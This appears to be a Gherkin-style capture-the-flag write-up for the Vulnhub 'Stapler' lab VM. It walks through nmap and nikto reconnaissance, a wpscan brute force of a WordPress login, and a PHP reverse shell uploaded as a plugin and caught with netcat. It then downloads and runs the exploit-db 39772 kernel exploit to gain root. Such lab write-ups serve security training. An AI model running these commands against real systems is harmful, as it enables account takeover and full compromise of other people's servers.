## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnhub
  Location:
   http://10.0.2.12/wp-content
  CWE:
    CWE-0078: Improper Neutralization of Special Elements used in an OS Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Get the remote connection with root privileges
  Recommendation:
    Always validate file types in an input

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Virtual Box     | 6.1           |
    | Kali Linux      | 2020.3        |
    | Firefox         | 68.10.0esr    |
    | arp-scan        | 1.9.7         |
    | nmap            | 7.80          |
    | dirb            | 2.22          |
    | nikto           | 2.1.6         |
    | wpscan          | 3.8.2         |
    | netcat          | v1.10-41.1+b1 |
  TOE information:
    Given a file "Stapler-disk1.vmdk"
    When I run it on Virtual Box
    Then I realize that the user is required to log in to the system
    And I turn off the virtual machine
    And I configure the network of stapler VM and Kali VM
    Then I turn on the Kali VM and the stapler VM
    And I proceed to look for the IPs of the networks with arp-scan
    And this can be seen in [evidence](img1.png)
    And I discover the IP of the stapler VM for this case is
    """
    10.0.2.12
    """
    Then I scan with nmap the open ports of stapler VM
    And I can see 8 open ports
    And this can be seen in [evidence](img2.png)

  Scenario: Normal use case
    Given the TCP open port "12380"
    When I search "http://10.0.2.12:12380/" in Firefox
    Then I access to a web page
    And this can be seen in [evidence](img3.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I access to http://10.0.2.12:12380
    When I try to detect site vulnerabilities running
    """
    nikto -h http://10.0.2.12:12380
    """
    Then I can see that the website has a SSL service
    And I can see a website directory located in file "robots.txt"
    And this can be seen in [evidence](img4.png)
    When I search "https://10.0.2.12:12380/blogblog" in Firefox
    Then I try to access to HTTPS service of the website
    And I access to a new web page as can be seen in [evidence](img5.png)
    When I try to find other website directories running
    """
    dirb https://10.0.2.12:12380/blogblog
    """
    Then I can see that the site has a directory in "/wp-content"
    And I can see that the site has a directory in "/wp-admin"
    And this can be seen in [evidence](img6.png)
    When I search "https://10.0.2.12:12380/blogblog/wp-content" in Firefox
    Then I can directly access files from this directory
    And this can be seen in [evidence](img7.png)

  Scenario: Exploitation
    Given I access to https://10.0.2.12:12380/blogblog/
    When I search the directory "/wp-admin" of the website in Firefox
    Then the directory is redirected to "/wp-login.php" of the website
    And I get a login page of WordPress as can be seen in [evidence](img8.png)
    When I try to enumerate the users with wpscan, running
    """
    wpscan --url https://10.0.2.12:12380/blogblog/ --disable-tls-checks
     --enumerate u
    """
    Then I get the users available on the website
    And this can be seen in [evidence](img9.png)
    When I brute force against user John, running
    """
    wpscan --url https://10.0.2.12:12380/blogblog/ --disable-tls-checks
     --usernames john --passwords /usr/share/wordlists/rockyou.txt
      -t 100 --password-attack wp-login
    """
    Then I get the user john's password
    And this can be seen in [evidence](img10.png)
    And I log in
    When I try to upload a PHP reverse shell "shell.php" as a new plugin
    And this can be seen in [evidence](img11.png)
    Then the website asks me for an FTP service account
    And I use the anonymous account
    And this can be seen in [evidence](img12.png)
    And I upload the PHP reverse shell successfully
    When I look for the "shell.php" file in the directory "/wp-content"
    Then I find the "shell.php" file in the "uploads" folder
    And this can be seen in [evidence](img13.png)
    Then I open a port 443 in Kali VM to get the reverse shell, running
    """
    nc -nvlp 443
    """
    And I open the "shell.php" file from "/wp-content/uploads"
    Then I get a reverse shell in Kali VM and I run
    """
    python -c 'import pty; pty.spawn("/bin/bash")'
    """
    And I get a shell TTY as can be seen in [evidence](img14.png)
    When I move to a writable directory, running
    """
    cd /tmp
    """
    Then I download the linux exploit suggester, running
    """
    wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/
     master/linux-exploit-suggester.sh -O les.sh
    """
    And I give execution permissions, running
    """
    chmod +x ./les.sh
    """
    When I run "./les.sh"
    Then I get a list of exploits to get root privileges in this system
    And I select the double-fdput as can be seen in [evidence](img15.png)
    And I download this exploit, running
    """
    wget https://github.com/offensive-security/exploit-database-bin-sploits/
     raw/master/bin-sploits/39772.zip
    """
    When I unzip the file "39772.zip", running "unzip 39772.zip"
    Then I get the folder "39772"
    And I run "cd 39772" to move to this directory
    And I run "ls" and I see the file "exploit.tar"
    Then I unzip it, running "tar xf ./exploit.tar"
    And I get the folder "ebpf_mapfd_doubleput_exploit"
    When I move to this directory, running "cd ebpf_mapfd_doubleput_exploit"
    Then I see the contents of the folder, running "ls"
    And I can see the file "compile.sh"
    And this can be seen in [evidence](img16.png)
    Then I run "./compile.sh"
    And I get the executable "doubleput"
    And this can be seen in [evidence](img17.png)
    When I run it
    Then I get root privileges
    And I run "cat /root/flag.txt"
    Then I get a message that the challenge ends
    And this can be seen in [evidence](img18.png)

  Scenario: Remediation
    When I make that the website validates the file types for a file input
    And I restrict direct access to these files from the website
    Then I avoid many vulnerabilities that could be attack vectors

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.8/10 (High) - AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.2/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.2/10 (High) - CR:M/IR:M/AR:M/MS:C/MC:H/MI:H/MA:H/

  Scenario: Correlations
    No correlations have been found to this date 2021-04-12
